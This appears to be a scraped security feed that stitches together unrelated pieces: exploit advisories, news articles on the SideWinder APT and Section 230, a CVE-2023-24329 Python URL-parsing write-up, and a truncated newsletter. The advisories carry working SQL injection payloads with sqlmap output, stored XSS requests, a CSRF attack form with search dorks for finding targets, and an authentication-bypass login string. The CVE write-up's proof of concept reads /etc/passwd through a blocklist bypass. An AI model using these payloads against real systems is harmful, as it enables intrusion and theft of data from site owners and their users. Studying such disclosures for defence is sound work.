Best POS Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    # Exploit Title: SQL Injection on Best pos Management System# Google Dork: NA# Date: 14/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage:https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip# Version: 1.0# Tested on: Windows 11# CVE : NA```GET /kruxton/billing/index.php?id=9 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/109.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://localhost/kruxton/index.php?page=ordersCookie: PHPSESSID=61ubuj4m01jk5tibc7banpldaoUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1```# PayloadGET parameter 'id' is vulnerable. Do you want to keep testing theothers (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 58HTTP(s) requests:---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=9 AND 4017=4017    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: id=9 OR (SELECT 7313 FROM(SELECTCOUNT(*),CONCAT(0x7162767171,(SELECT(ELT(7313=7313,1))),0x7178707671,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=9 AND (SELECT 5871 FROM (SELECT(SLEEP(5)))rwMY)    Type: UNION query    Title: Generic UNION query (NULL) - 6 columns    Payload: id=-9498 UNION ALL SELECTNULL,NULL,NULL,NULL,CONCAT(0x7162767171,0x53586b446c4c75556d48544175547856636d696171464e624c6572736f55415246446a4b56777749,0x7178707671),NULL------[19:33:33] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.0.25, Apache 2.4.54back-end DBMS: MySQL >= 5.0 (MariaDB fork)```----------------------------# Exploit Title: SQL Injection on Best pos Management System# Google Dork: NA# Date: 17/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage:https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip# Version: 1.0# Tested on: Windows 11# CVE : NA_________python sqlmap.py -u "http://localhost/kruxton/manage_user.php?id=4*"--dbms=mysql --level 3 --risk 3 --dbs --fresh-queriesURI parameter '#1*' is vulnerable. Do you want to keep testing theothers (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 52HTTP(s) requests:---Parameter: #1* (URI)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: http://localhost:80/kruxton/manage_user.php?id=4<http://localhost/kruxton/manage_user.php?id=4> AND 6332=6332    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: http://localhost:80/kruxton/manage_user.php?id=4<http://localhost/kruxton/manage_user.php?id=4> OR (SELECT 6586FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT(ELT(6586=6586,1))),0x7170787871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: http://localhost:80/kruxton/manage_user.php?id=4<http://localhost/kruxton/manage_user.php?id=4> AND (SELECT 3605 FROM(SELECT(SLEEP(5)))zHgC)    Type: UNION query    Title: Generic UNION query (NULL) - 5 columns    Payload: http://localhost:80/kruxton/manage_user.php?id=-1830<http://localhost/kruxton/manage_user.php?id=-1830> UNION ALL SELECTNULL,NULL,CONCAT(0x716a6b6a71,0x4b5276534542756c4e596a4f7377506a73517a73544b4e44737946636674736c526c775277594976,0x7170787871),NULL,NULL------[10:58:18] [INFO] the back-end DBMS is MySQLweb application technology: PHP, Apache 2.4.54, PHP 8.0.25back-end DBMS: MySQL >= 5.0 (MariaDB fork)

Best POS Management System 1.0 SQL Injection

Best POS Management System version 1.0 suffers from multiple persistent cross site scripting vulnerabilities.

# Exploit Title: Stored Cross Site Scripting on Best pos Management System  
# Google Dork: NA  
# Date: 14/2/2023  
# Exploit Author: Ahmed Ismail (@MrOz1l)  
# Vendor Homepage:  
https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html  
# Software Link:  
https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip  
# Version: 1.0  
# Tested on: Windows 11  
# CVE : NA

# Description

Payload : "><img src=x onerror=prompt(document.domain);>

# POC :  
1- Head to Add Category on  
"http://localhost/kruxton/index.php?page=add-category"

2- On Name Parameter add our Payload "><img src=x  
onerror=prompt(document.domain);>

3- After Adding This Category XSS will run

```

POST /kruxton/ajax.php?action=save_category HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/109.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data;  
boundary=---------------------------7128987773293048653857517  
Content-Length: 442  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/kruxton/index.php?page=add-category  
Cookie: PHPSESSID=61ubuj4m01jk5tibc7banpldao  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

-----------------------------7128987773293048653857517  
Content-Disposition: form-data; name="id"

-----------------------------7128987773293048653857517  
Content-Disposition: form-data; name="name"

XSSPOC"><img src=x onerror=prompt(document.domain);>  
-----------------------------7128987773293048653857517  
Content-Disposition: form-data; name="description"

This is POC  
-----------------------------7128987773293048653857517--  
```

--------------------------------------

# Exploit Title: Stored Cross Site Scripting on Best pos Management System  
# Google Dork: NA  
# Date: 17/2/2023  
# Exploit Author: Ahmed Ismail (@MrOz1l)  
# Vendor Homepage:  
https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html  
# Software Link:  
https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip  
# Version: 1.0  
# Tested on: Windows 11  
# CVE : NA

Payload : "><img src=x onerror=prompt(document.domain);>

# POC :  
1- Head to Add Category on  
"http://localhost/kruxton/ajax.php?action=save_product"

2- On Name Parameter add our Payload "><img src=x  
onerror=prompt(document.domain);>

on description <img src=x onerror=prompt(2);>

3- After Adding This Category XSS will run

```

POST /kruxton/ajax.php?action=save_product HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/109.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data;  
boundary=---------------------------11015616619250686693182759357  
Content-Length: 830  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/kruxton/index.php?page=add-product  
Cookie: PHPSESSID=<COOKIE>  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin

-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="id"

-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="category_id"

3'  
-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="name"

XSSPOC2"><img src=x onerror=prompt(document.domain);>  
-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="description"

XSSPOC2"><img src=x onerror=prompt(2);>  
-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="price"

1122  
-----------------------------11015616619250686693182759357  
Content-Disposition: form-data; name="status"

1  
-----------------------------11015616619250686693182759357--

```

Best POS Management System 1.0 Cross Site Scripting

By Habiba Rashid
The suspected Indian state-sponsored group has targeted 61 government, military, law enforcement, and other organizations across the Asia-Pacific region.
This is a post from HackRead.com Read the original post: SideWinder Behind Govt Phishing Spree Across the East

SideWinder is apparently an India-based advanced persistent threat (APT) group known for spreading malware, infiltrating networks, and stealing sensitive information.

Security researchers at Group-IB have finally been successful in connecting a series of phishing campaigns between June and November 2021 to an Indian Advanced Persistent Threat (APT) group, SideWinder.

The suspected state-sponsored group has targeted 61 government, military, law enforcement, and other organizations across the Asia-Pacific region, according to a report from Group-IB.

Also known as Rattlesnake, Hardcore Nationalist (HN2), and T-APT4, the group is considered one of the oldest national-state groups, going as far back as 2012. **In January 2020**, the group was found to be infecting Android devices with malware through the Play Store.

In another attack **reported in February 2022**, SideWinder was observed collaborating with another group called ModifiedElephant and targeting unsuspecting users by planting incriminating evidence on their devices.

In June of last year, the group’s custom tool, SideWinder.AntiBot.Script, was used in previously undocumented phishing attacks against Pakistani organizations. The group was also linked to an attack on the Maldivian government in 2020.

Like many others, SideWinder also uses **spear phishing** as its initial attack vector, sending phishing emails containing malicious attachments or URLs to victims. Two of these campaigns featured emails in which the group impersonated a cryptocurrency firm, said Group-IB.

If a user clicks on the link attachment, a malicious document, an LNK file, or a payload is subsequently downloaded onto their computer. The LNK file downloads an HTA file, which then downloads the payload. This payload could be either a remote access Trojan (RAT) or an information stealer, according to Group-IB’s technical analysis.

Further, two new custom-made SideWinder tools discovered by Group-IB during the campaign were SideWinder.RAT.b, a RAT, and SideWinder.StealerPy, an info-stealer.

The info-stealer is capable of collecting **Google Chrome browsing history**, credentials saved in the browser, the list of folders in the directory, meta-information, the contents of docx, pdf, and txt files and more.

The APT group’s motive seems to be linked to India’s cryptocurrency market, Group-IB’s **report** speculates.

> “Interestingly, Group-IB analysts discovered two phishing projects mimicking crypto companies. SideWinder’s growing interest in cryptocurrency could be linked to the recent attempts to regulate the crypto market in India.”

However, Group-IB cannot confirm how many, if any, of these phishing campaigns were successful. Nevertheless, users and organizations must take precautions against SideWinder’s attack, starting with the following steps:

**Keep your software up to date:** Make sure your operating system and all your software are up to date with the latest security patches. This will help protect you against known vulnerabilities that could be exploited by SideWinder.

**Use strong passwords:** Use complex and unique passwords for all your accounts and enable two-factor authentication whenever possible. This can help prevent unauthorized access to your accounts and make it more difficult for SideWinder to gain access.

**Be cautious of phishing emails:** SideWinder often uses phishing emails to trick users into clicking on a malicious link or downloading a malicious attachment. Be cautious of emails from unknown senders, and do not click on links or download attachments unless you are sure they are safe.

**Use anti-malware software:** Install and use anti-malware software to help detect and prevent SideWinder attacks. Make sure your **anti-malware software** is up to date and set to automatically scan your system on a regular basis.

**Limit access to sensitive information:** Limit the number of people who have access to sensitive information, and use encryption to protect data that is transmitted or stored.

**Train employees:** **Train employees** on how to recognize and avoid SideWinder attacks. Educate them on safe browsing habits, how to identify phishing emails, and the importance of keeping software up to date.

1.  **Nation-State Hackers Targeted Facebook – Meta**
2.  **Novel Confucius Android spyware hits Pakistan military**
3.  **Indian PM Modi’s Twitter Account HACKED for Bitcoin scam**
4.  **Google closes sites with ties to hack-for-hire groups in India**
5.  **Indian APT infects its own devices, exposes Modus Operandi**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

SideWinder Behind Govt Phishing Spree Across the East

Demanzo Matrimony version 1.5 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Demanzo Matrimony v.1.5 CSRF Vulnerability                                                                         |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0.1(32-bit)                                            |   
| # Vendor    : https://demanzo.com/matrimony-site-development/                                                                    |    
| # Dork      : Powered by ITAcumens or "Powered by Demanzo"                                                                       |  
====================================================================================================================================

poc :

[+] infected file: add-staff.php

[+] Inside folder /admin/add-staff.php

[+] Dorking İn Google Or Other Search Enggine.

[+] Copy the code below and paste it into an HTML file.

[+] Go to the line 2.

[+] Set the target site link Save changes and apply . 

</div>  
                       <form action="https://www.example/web/html/admin/add-staff.php" method="POST">  
            <div id="msg">  
                          <div class="form-group ban_btm1 col-md-6 no_pad">  
                              <label class="control-label col-md-4 frm_pd">Name <span class="red">*</span> : </label>  
                                <div class="col-md-8 frm_pd">  
                                  <input required="" name="name" id="name" value="" type="text" class="form-control" placeholder="Enter Name">     
                                </div>  
                            </div>

                                                        <div class="form-group ban_btm1 col-md-6 no_pad">  
                              <label class="control-label col-md-4 frm_pd">Password <span class="red">*</span> : </label>  
                                <div class="col-md-8 frm_pd">  
                                  <input required="" name="pass" id="pass" value="" type="password" class="form-control" placeholder="Enter Password">     
                                </div>  
                            </div>

                                                        <div class="form-group ban_btm1 col-md-6 no_pad">  
                              <label class="control-label col-md-4 frm_pd">Email ID <span class="red">*</span> : </label>  
                                <div class="col-md-8 frm_pd">  
                                  <input required="" name="email" id="email" value="" type="email" class="form-control" placeholder="Enter Email ID">     
                                </div>  
                            </div>

                                                        <div class="form-group ban_btm1 col-md-6 no_pad">  
                              <label class="control-label col-md-4 frm_pd">Gender <span class="red">*</span> : </label>  
                                <div class="col-md-8 frm_pd">   
                                    <input type="radio" name="gender" value="Male" checked=""><label class="rd_btn">Male</label>  
                                    <input type="radio" name="gender" value="Female"><label class="rd_btn">Female</label>  
                            </div>  
                            </div>

                                                           <div class="form-group ban_btm1 col-md-12 no_pad">  
                              <label class="control-label frm_pd col-md-2">Designation <span class="red">*</span> : </label>  
                                <div class="col-md-10 frm_pd">  
                                  <input required="" name="designation" value="" id="designation" type="text" class="form-control" placeholder="Enter Designation">     
                                </div>  
                            </div>   

                                                        <div class="form-group ban_btm1 col-md-12 no_pad">  
                              <label class="control-label col-md-2 frm_pd">Address  <span class="red">*</span> : </label>  
                                <div class="col-md-10 frm_pd">  
                                  <textarea required="" name="address" id="address" rows="7" class="form-control" placeholder="Enter Address"></textarea>    
                                </div>  
                            </div> 

                                                          
                                
                                  
                                    
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                  
                            

                                                          
                                
                                  
                                       
                                       
                              
                            

                                                        <div class="form-group ban_btm1 col-lg-5 col-md-12 no_pad">  
                              <label class="control-label col-lg-4 col-md-2 frm_pd no_pad">Staff Status <span class="red">*</span> : </label>  
                                <div class="col-lg-8 col-md-10 frm_pd">   
                                    <input type="radio" name="status" value="0" checked=""><label class="rd_btn">Active</label>  
                                    <input type="radio" name="status" value="1"><label class="rd_btn">Inactive</label>  
                            </div>  
                            </div>

                                                        <div class="col-md-2 col-md-offset-5 col-sm-12">  
                                <input type="submit" class="ctn_btn no_mt1" value="Add" name="add">  
                            </div> 

 Greetings to :===================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|          
==================================================================================================

Demanzo Matrimony 1.5 Cross Site Request Forgery

Argon Dashboard version 1.1.2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Argon Dashboard - v1.1.2 Auth By Pass Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0(64-bit)                                              | | # Vendor    : https://www.creative-tim.com/product/argon-dashboard#                                                              |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user : 'or''='@gmail.com1 & Pass : 'or''='[+] https://127.0.0.1/aadarshinstrumentscom/admin/examples/inquiry.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Argon Dashboard 1.1.2 SQL Injection

Categories: News
Tags: section 230

Tags:  Gonzalez v. Google

Tags:  Twitter v. Taamneh

Tags:  liability

Tags:  publisher

Tags:  distributor

Tags:  ChatGPT

The Supreme Court's reconsideration of Section 230, a law that’s been the foundation for the way in which we have used the Internet for decades, could trigger major changes.



(Read more...)




The post Two Supreme Court cases could change the Internet as we know it appeared first on Malwarebytes Labs.

The Supreme Court is about to reconsider Section 230, a law that’s been the foundation of the way we have used the Internet for decades.

The court will be handling a few cases that at first glance are about online platforms' liability for hosting accounts from foreign terrorists. But at a deeper level these cases could determine whether or not algorithmic recommendations should receive the full legal protections of Section 230.

The implications of removing that protection could be huge. Section 230 has frequently been referred to as a key law, which has allowed the Internet to develop to what it is now. Whether we like it or not.

The are two cases waiting to be heard by the Supreme Court are Gonzalez v. Google and Twitter v. Taamneh. Both seek to draw big tech into the war on terror. The plaintiffs in both suits rely on a federal law that allows any USA national who is injured by an act of international terrorism to sue anyone who knowingly provided substantial assistance to whoever carried it out. The reasoning is that the platforms, Google and Twitter, provided assistance to terrorists by giving them the ability to recruit new members.

Section 230 is the provision that has, until now, protected those platforms from the negative consequences of user-generated content.

**Section 230**

Section 230 is a section of Title 47 of the United States Code that was enacted as part of the Communications Decency Act (CDA) of 1996, which is Title V of the Telecommunications Act of 1996, and generally provides immunity to websites from the negative effects of third-party content.

What's in question is whether providers should be treated as publishers or, alternatively, as distributors of content created by its users.

Before the Internet, a liability line was drawn between publishers of content and distributors of content. A publisher would be expected to have awareness of the material they published and could be held liable for it, while a distributor would likely not be aware and as such would be immune.

> No provider or user of an interactive computer service shall be treated as the publisher or speaker of any information provided by another information content provider.

Section 230 protections have never been limitless though, and require providers to remove material illegal on a federal level, such as in copyright infringement cases.

It all became a bit more complicated when online platforms—and social media in particular—started using algorithms that are designed to keep us occupied. These algorithms make sure that we are presented with content we have shown an interest in. The goal is to make us spend as much time on that platform as possible while the platform earns advertising dollars. While the content was not created by the platform, the algorith definitely does the bidding of the platform.

In the early days (cases that played out before the turn of the century) moderation was seen as an editorial action which shifted a platform from a distributor role into a publisher role, which didn’t exactly help to get some form of moderation started.

In modern times, now that moderation has become the norm on social platforms, the scale of content moderation decisions that need to be taken is immense. Reportedly, within a 30-minute timeframe, Facebook takes down over 615,000 pieces of content, YouTube removes more than 271,000 videos, channels and comments, and TikTok takes down nearly 19,000 videos.

**Possible implications**

Section 230, from an Internet perspective is an ancient law, written at a time when the Internet looked very different than it does today. Which brings us back to the algorithms that have people scrolling social media all day. One of the consequences of these algorithms noticing a preference for a particular subject is that they will serve you increasingly extreme content in that category.

Making platforms liable for the content provided by their users is likely to make everything a lot slower. Imagine what will happen if every frame of every video has to be analyzed and approved before it gets posted. We would soon see rogue social media platforms where you can’t sue anyone because the operators are hiding behind avatars on the Dark Web or in countries beyond the reach of US extradition treaties.

It could even have a chilling effect on freedom of speech, as social media platforms seek to avoid the risk of getting sued over the back and forth in a heated argument.

And what about the recent popularity surge we have seen in chatbots? Who will be seen as the publisher when ChatGPT and Bing Chat (or DAN and Sydney as their friends like to call them) uses online content to formulate a new answer without pointing out where they found the original content?

Let’s not forget sites that have an immense userbase, like Reddit, which largely depend on human volunteer moderators and a bit of automation to keep things civilized. Will those volunteers stick around when they can be blamed for million dollar lawsuits against the site?

Even easily overlooked services like Spotify could be facing lawsuits if their algorithm suggested a podcast that contains content considered harmful or controversial.

**The Halting Problem**

Stopping bad things from happening on platforms like Google and Twitter is an admirable ambition, but it is probably impossbile. Even if they were able to fully automate moderation, they would quickly run into the halting problem associated with decision problems.

A decision problem is a computational problem that can be posed as a yes–no question of the input values. So, is this content allowed or not? That sounds like a simple question, but is it? Turing proved no algorithm exists that always correctly decides whether, for a given arbitrary program and input, the program halts when run with that input. This is called the halting problem.

A direct derivative of the halting problem is that no algorithm will _always_ make the correct decision in a decision problem as complicated as content moderation.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Two Supreme Court cases could change the Internet as we know it

An issue in the urllib.parse component of Python before v3.11 allows attackers to bypass blocklisting methods by supplying a URL that starts with blank characters.

**Timelines**

07/20/2022: Issue first discoverd

08/03/2022: Report sent to security@python.org

08/25/2022: One staff wrote: “I personally agree this should probably be improved, we’ll see if I can convince the others. They’ll likely say we need to work through it publicly”

09/30/2022: Report accepted by CERT. (VU#127587)

11/12/2022: Issue is accidently fixed https://github.com/python/cpython/issues/99418. But the exploit is still private.

01/20/2023: Article published and apply for a CVE number.

**Summary**

urllib.parse is a very basic and widely used basic URL parsing function in various applications. One of Python’s core functions, urlparse, has a parsing problem when the entire URL starts with blank characters. This problem affects both the parsing of hostname and scheme, and eventually causes any blocklisting methods to fail.

This vulnerability is applicable to all python version before 3.11.

**Affected Module:**

urllib (https://github.com/python/cpython/tree/3.11/Lib/urllib)

**Relevant Package Manager/Ecosystem**

https://docs.python.org/3/library/urllib.html

**Root Cause of the Problems**

File Name: \\Python\\Python39\\Lib\\urllib\\parse.py

def urlparse(url, scheme='', allow\_fragments=True):
    """Parse a URL into 6 components:
    <scheme>://<netloc>/<path>;<params>?<query>#<fragment>

    The result is a named 6-tuple with fields corresponding to the
    above. It is either a ParseResult or ParseResultBytes object,
    depending on the type of the url parameter.

    The username, password, hostname, and port sub-components of netloc
    can also be accessed as attributes of the returned object.

    The scheme argument provides the default value of the scheme
    component when no scheme is found in url.

    If allow\_fragments is False, no attempt is made to separate the
    fragment component from the previous component, which can be either
    path or query.

    Note that % escapes are not expanded.
    """
    url, scheme, \_coerce\_result = \_coerce\_args(url, scheme)
    splitresult = urlsplit(url, scheme, allow\_fragments)
    scheme, netloc, url, query, fragment = splitresult
    if scheme in uses\_params and ';' in url:
        url, params = \_splitparams(url)
    else:
        params = ''
    result = ParseResult(scheme, netloc, url, params, query, fragment)
    return \_coerce\_result(result)

The urlparse() function itself is more like a wrapper function. The mean function to process the URL is urlsplit() inside the same file.

def urlsplit(url, scheme=”, allow\_fragments=True):  
“””Parse a URL into 5 components:  
:///?#

def urlsplit(url, scheme='', allow\_fragments=True):
    """Parse a URL into 5 components:
    <scheme>://<netloc>/<path>?<query>#<fragment>

    The result is a named 5-tuple with fields corresponding to the
    above. It is either a SplitResult or SplitResultBytes object,
    depending on the type of the url parameter.

    The username, password, hostname, and port sub-components of netloc
    can also be accessed as attributes of the returned object.

    The scheme argument provides the default value of the scheme
    component when no scheme is found in url.

    If allow\_fragments is False, no attempt is made to separate the
    fragment component from the previous component, which can be either
    path or query.

    Note that % escapes are not expanded.
    """

    url, scheme, \_coerce\_result = \_coerce\_args(url, scheme)

    for b in \_UNSAFE\_URL\_BYTES\_TO\_REMOVE:
        url = url.replace(b, "")
        scheme = scheme.replace(b, "")

    allow\_fragments = bool(allow\_fragments)
    key = url, scheme, allow\_fragments, type(url), type(scheme)
    cached = \_parse\_cache.get(key, None)
    if cached:
        return \_coerce\_result(cached)
    if len(\_parse\_cache) >= MAX\_CACHE\_SIZE: # avoid runaway growth
        clear\_cache()
    netloc = query = fragment = ''
    i = url.find(':')
    if i > 0:
        for c in url\[:i\]:
            if c not in scheme\_chars:
                break
        else:
            scheme, url = url\[:i\].lower(), url\[i+1:\]

    if url\[:2\] == '//':
        netloc, url = \_splitnetloc(url, 2)
        if (('\[' in netloc and '\]' not in netloc) or
                ('\]' in netloc and '\[' not in netloc)):
            raise ValueError("Invalid IPv6 URL")
    if allow\_fragments and '#' in url:
        url, fragment = url.split('#', 1)
    if '?' in url:
        url, query = url.split('?', 1)
    \_checknetloc(netloc)
    v = SplitResult(scheme, netloc, url, query, fragment)
    \_parse\_cache\[key\] = v
    return \_coerce\_result(v)

On line 24, the **\_UNSAFE\_URL\_BYTES\_TO\_REMOVE** list is good for prevent injection.

    for b in _UNSAFE_URL_BYTES_TO_REMOVE:
            url = url.replace(b, "")
            scheme = scheme.replace(b, "")

On line 39, the content of scheme\_chars is below:

    if i > 0:
            for c in url[:i]:
                if c not in scheme_chars:
                    break
            else:
                scheme, url = url[:i].lower(), url[i+1:]

**Since it is a for-else structure, once there is any char not in _scheme\_chars,_ scheme and url will not be assigned by the parsed value.**

Therefore, Scheme will be blank and URL will be the whole string.

Going forward, the condition of _if url\[:2\] == ‘//’:_ will not hold anymore (for normal URL, it will be true because the URL will be assigned as url\[i+1:\] in the previous else clause)

Therefore, netloc and

    if url[:2] == '//':
            netloc, url = _splitnetloc(url, 2)
            if (('[' in netloc and ']' not in netloc) or
                    (']' in netloc and '[' not in netloc)):
                raise ValueError("Invalid IPv6 URL")

Then, on line 54, this is a function to concatenate each component

    v = SplitResult(scheme, netloc, url, query, fragment)

    class SplitResult(_SplitResultBase, _NetlocResultMixinStr):
        __slots__ = ()
        def geturl(self):
            return urlunsplit(self)

    def urlunsplit(components):
        """Combine the elements of a tuple as returned by urlsplit() into a
        complete URL as a string. The data argument can be any five-item iterable.
        This may result in a slightly different, but equivalent URL, if the URL that
        was parsed originally had unnecessary delimiters (for example, a ? with an
        empty query; the RFC states that these are equivalent)."""
        scheme, netloc, url, query, fragment, _coerce_result = (
                                              _coerce_args(*components))
        if netloc or (scheme and scheme in uses_netloc and url[:2] != '//'):
            if url and url[:1] != '/': url = '/' + url
            url = '//' + (netloc or '') + url
        if scheme:
            url = scheme + ':' + url
        if query:
            url = url + '?' + query
        if fragment:
            url = url + '#' + fragment
        return _coerce_result(url)

Since the previous pre-processing are all failed, the whole URL will be regraded as path and other components will be regraded as blank.

As a final result, the parsed result of parsed = urlparse(“\*https://google.com”), will be

abnormal case of urlparse(“\*https://google.com”)

normal case of urlparse(”https://google.com”)

**As an intermediate conclusion, we know that chars not in scheme\_chars will cause urlparse() function to misinterpret results, impacting nearly every field including hostname and scheme.**

However, so far the results is just interesting but not impressive because the URL isn’t really visible.

urllib.request.urlopen("*<https://google.com>") gives us a

_urllib.error.URLError: <urlopen error unknown url type: \*https> error_

After some research, I found **blank** is magic characters helping us to achieve our goal that makes our URL visitable but at same time gives urlparse() a misbehaved result.

For urlopen, the step extracting scheme happening in

    def _splittype(url):
        """splittype('type:opaquestring') --> 'type', 'opaquestring'."""
        global _typeprog
        if _typeprog is None:
            _typeprog = re.compile('([^/:]+):(.*)', re.DOTALL)
    
        match = _typeprog.match(url)
        if match:
            scheme, data = match.groups()
            return scheme.lower(), data
        return None, url

but before entering this step, the URL will be go through

    def full_url(self, url):
            # unwrap('<URL:type://host/path>') --> 'type://host/path'
            self._full_url = unwrap(url)
            self._full_url, self.fragment = _splittag(self._full_url)
            self._parse()

    def unwrap(url):
        """Transform a string like '<URL:scheme://host/path>' into 'scheme://host/path'.
    
        The string is returned unchanged if it's not a wrapped URL.
        """
        url = str(url).strip()
        if url[:1] == '<' and url[-1:] == '>':
            url = url[1:-1].strip()
        if url[:4] == 'URL:':
            url = url[4:].strip()
        return url

the strip function gets rid of the leading blank(s). so that it behave normally.

For request library, there is also a similar function to process URL

    def prepare_url(self, url, params):
            """Prepares the given HTTP URL."""
            #: Accept objects that have string representations.
            #: We're unable to blindly call unicode/str functions
            #: as this will include the bytestring indicator (b'')
            #: on python 3.x.
            #: https://github.com/psf/requests/pull/2238
            if isinstance(url, bytes):
                url = url.decode('utf8')
            else:
                url = unicode(url) if is_py2 else str(url)
    
            # Remove leading whitespaces from url
            url = url.lstrip()

the lstrip function also gets rid of the leading blank(s). so that it behave normally.

Since those are two most prevailing libraries in Python, this vulnerability is already very applicable in many cases and situations.

(NOTE: leading blanks are also valid in current mainstream browsers but It will still fail on urllib3 because there is no similar strip() on it. )

**PoCs**

    import urllib.request
    from urllib.parse import urlparse
    
    def safeURLOpener(inputLink):
        block_schemes = ["file", "gopher", "expect", "php", "dict", "ftp", "glob", "data"]
        block_host = ["instagram.com", "youtube.com", "tiktok.com"]
    
        input_scheme = urlparse(inputLink).scheme
        input_hostname = urlparse(inputLink).hostname
    
        if input_scheme in block_schemes:
            print("input scheme is forbidden")
            return
    
        if input_hostname in block_host:
            print("input hostname is forbidden")
            return
    
        target = urllib.request.urlopen(inputLink)
        content = target.read()
        print(content)
    
    
    def main():
        safeURLOpener(" https://youtube.com")
        safeURLOpener(" file://127.0.0.1/etc/passwd")
        safeURLOpener(" data://text/plain,<?php phpinfo()?>")
        safeURLOpener(" expect://whoami")

**Impact**

I personally think the impact of this vulnerability is huge because this urlparse() library is widely used. Although blocklist is considered an inferior choice, there are many scenarios where blocklist is still needed. This vulnerability would help an attacker to bypass the protections set by the developer for scheme and host. This vulnerability can be expected to help SSRF and RCE in a wide range of scenarios.

Google has accepted my similar report regarding android’s URL parse function and gave a moderate severity since it does affect a number of their own open source project. In the case of Python, I believe the impact may be wider.

**Mitigation**

Community should also add strip() function before processing the URL, thereby eliminating this inconsistency.

CVE-2023-24329: Python URL Parse Problem – PointerNull

Hey 👋 there, cyber friends!
Welcome to this week's cybersecurity newsletter, where we aim to keep you informed and empowered in the ever-changing world of cyber threats.
In today's edition, we will cover some interesting developments in the cybersecurity landscape and share some insightful analysis of each to help you protect yourself against potential attacks.
1. Apple 📱 Devices Hacked with

Hey 👋 there, cyber friends!

Welcome to **this week's cybersecurity newsletter**, where we aim to keep you informed and empowered in the ever-changing world of cyber threats.

In today's edition, we will cover some interesting developments in the cybersecurity landscape and share some insightful analysis of each to help you protect yourself against potential attacks.

****1\. Apple 📱 Devices Hacked with New Zero-Day Bug - Update ASAP!****

Have you updated your Apple devices lately? If not, it's time to do so, as the tech giant just released security updates for iOS, iPadOS, macOS, and Safari. The update is to fix a zero-day vulnerability that hackers have been exploiting.

This vulnerability, tracked as CVE-2023-23529, is related to a type confusion bug in the WebKit browser engine. What does this mean? Well, it means that if you visit a website with malicious code, the bug can be activated, leading to arbitrary code execution. In other words, hackers can take control of your device and access all your data.

